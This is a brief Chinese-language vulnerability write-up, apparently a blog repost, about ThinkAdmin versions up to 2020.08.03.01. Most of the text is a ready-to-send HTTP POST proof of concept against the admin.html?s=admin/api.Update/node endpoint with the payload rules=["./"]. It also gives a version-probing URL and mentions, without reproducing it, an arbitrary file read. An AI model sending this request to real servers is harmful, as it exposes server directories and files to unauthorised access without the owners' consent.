漏洞简介
ThinkAdmin是基于 ThinkPHP 的微信后台管理平台
影响范围:
Thinkadmin版本小于 ≤ 2020.08.03.01
漏洞复现:
获取版本信息:
https://xxxxx/admin.html?s=admin/api.Update/version
POC
POST /admin.html?s=admin/api.Update/node HTTP/1.1 Host: xxxxxx Accept: */* Accept-Language: en User-Agent: Mozilla/5.0 (compatible; MSIE 9.0; Windows NT 6.1; Win64; x64; Trident/5.0) Connection: close Content-Type: application/x-www-form-urlencoded Content-Length: 22 rules=%5B%22.%2F%22%5D
rules=%5B%22.%2F%22%5D为["./"]
也可实现任意文件读取,此文章暂无复现。
原文:https://www.cnblogs.com/T0uch/p/14355137.html